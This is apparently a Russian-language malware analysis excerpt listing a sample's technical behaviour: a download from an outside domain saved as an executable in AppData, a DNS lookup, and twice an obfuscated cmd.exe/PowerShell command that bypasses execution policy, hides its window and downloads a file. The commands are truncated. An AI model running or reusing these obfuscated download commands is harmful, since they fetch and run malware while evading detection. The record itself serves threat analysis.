Техническая информация
- http://randoz-pandom.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Po^W^e^rSHEl^L^.^EXe^ -e^xe^CUTIo^n^PO^lICY^ Byp^aSs -No^P^rO^fiLE ^-W^ind^o^WStY^le h^IdDeN (^N^Ew^-O^BJec^t sYS^tEm.N^ET.^weBCLienT)^.DOwNl^oadfIle('http://randoz-pando...
- DNS ASK ra####-pandom.wang
- '<SYSTEM32>\cmd.exe' /C "Po^W^e^rSHEl^L^.^EXe^ -e^xe^CUTIo^n^PO^lICY^ Byp^aSs -No^P^rO^fiLE ^-W^ind^o^WStY^le h^IdDeN (^N^Ew^-O^BJec^t sYS^tEm.N^ET.^weBCLienT)^.DOwNl^oadfIle('http://randoz-pando...' (со скрытым окном)